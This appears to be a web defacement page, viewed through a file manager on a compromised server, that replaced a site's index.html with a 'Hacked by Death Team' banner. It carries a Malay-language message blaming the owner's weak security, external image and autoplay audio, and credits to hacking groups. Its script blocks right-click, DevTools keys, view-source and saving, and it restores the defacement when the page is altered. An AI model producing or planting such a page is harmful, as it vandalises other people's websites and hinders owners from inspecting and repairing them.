KOKINIO - MANAGER
Edit File: index.html
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Hacked by Death Team</title> <style> body { margin: 0; background: #000; color: #fff; font-family: Arial, sans-serif; text-align: center; user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; } .container { display: flex; flex-direction: column; justify-content: center; align-items: center; min-height: 100vh; pointer-events: auto; } h1 { font-size: 28px; margin-bottom: 6px; } h2 { font-size: 16px; margin-top: 0; margin-bottom: 20px; font-weight: normal; } img { width: 220px; max-width: 80%; margin-bottom: 20px; pointer-events: none; } p { font-size: 12px; color: #ccc; } .message { font-size: 14px; color: #ffffff; max-width: 600px; margin: 20px auto; padding: 10px; font-style: italic; border-top: 1px solid #333; border-bottom: 1px solid #333; } audio { width: 250px; margin-top: 10px; } </style> </head> <body> <div class="container"> <h1>HACKED BY DEATH TEAM</h1> <h2>Mr Malz Has Here!!!</h2> <img src="https://b.top4top.io/p_3581qwkh40.png" alt="Death Team"> <audio controls autoplay> <source src="https://j.top4top.io/m_3581g0mrj0.mp3" type="audio/mpeg"> Browser anda tidak mendukung audio tag. </audio> <!-- TAMBAHAN MESEJ DARI PENGGUNA --> <div class="message"> "aku melakukan ini bukan tanpa sebab aku melakukan ini kerana kerentanan website mu sangat rendah aku jugak ingin meninggalkan jejak supaya engkau tak melakukan kesalahan di masa Yang akan datang" <br><strong>from Malaysia</strong> </div> <!-- TAMAT TAMBAHAN --> <p>Phantom Blackhat — Monarchy Sec Team Novra Sec Team</p> </div> <script> // PROTEKSI RINGAN TAPI EFEKTIF (function() { 'use strict'; // Simpan HTML asli sekali saja const originalContent = document.body.innerHTML; // 1. Blokir klik kanan sederhana document.oncontextmenu = function() { return false; }; // 2. Blokir shortcut keyboard utama document.onkeydown = function(e) { // Blokir F12 if (e.key === 'F12') return false; // Blokir Ctrl+Shift+I (Chrome DevTools) if (e.ctrlKey && e.shiftKey && e.key === 'I') return false; // Blokir Ctrl+Shift+J (Chrome Console) if (e.ctrlKey && e.shiftKey && e.key === 'J') return false; // Blokir Ctrl+Shift+C (Inspect Element) if (e.ctrlKey && e.shiftKey && e.key === 'C') return false; // Blokir Ctrl+U (View Source) if (e.ctrlKey && e.key === 'u') return false; // Blokir Ctrl+S (Save Page) if (e.ctrlKey && e.key === 's') { e.preventDefault(); return false; } }; // 3. Deteksi DevTools sederhana (cek ukuran window) let devtoolsOpen = false; function checkDevTools() { const widthDiff = window.outerWidth - window.innerWidth; const heightDiff = window.outerHeight - window.innerHeight; if (widthDiff > 100 || heightDiff > 100) { if (!devtoolsOpen) { devtoolsOpen = true; // Cuma tampilkan warning, tidak redirect document.body.innerHTML += '<div style="position:fixed;top:10px;right:10px;background:red;color:white;padding:5px;font-size:10px;z-index:9999">DEVTOOLS DETECTED</div>'; } } else { devtoolsOpen = false; } } // Cek setiap 2 detik (tidak terlalu sering) setInterval(checkDevTools, 2000); // 4. Proteksi DOM sederhana - hanya kalau ada perubahan besar let lastHTML = document.body.innerHTML; function protectDOM() { if (document.body.innerHTML.length < lastHTML.length * 0.5) { // Jika konten dihapus lebih dari 50%, restore document.body.innerHTML = originalContent; } lastHTML = document.body.innerHTML; } // Cek setiap 3 detik setInterval(protectDOM, 3000); // 5. Tambahkan pesan di console console.log('%c⚠️ WARNING ⚠️', 'color: red; font-size: 30px; font-weight: bold;'); console.log('%cThis page is protected by Death Team', 'color: yellow; font-size: 16px;'); console.log('%cAny modification attempts are logged', 'color: white; font-size: 14px;'); // 6. Nonaktifkan drag & drop document.ondragstart = function() { return false; }; document.ondrop = function() { return false; }; })(); </script> </body> </html>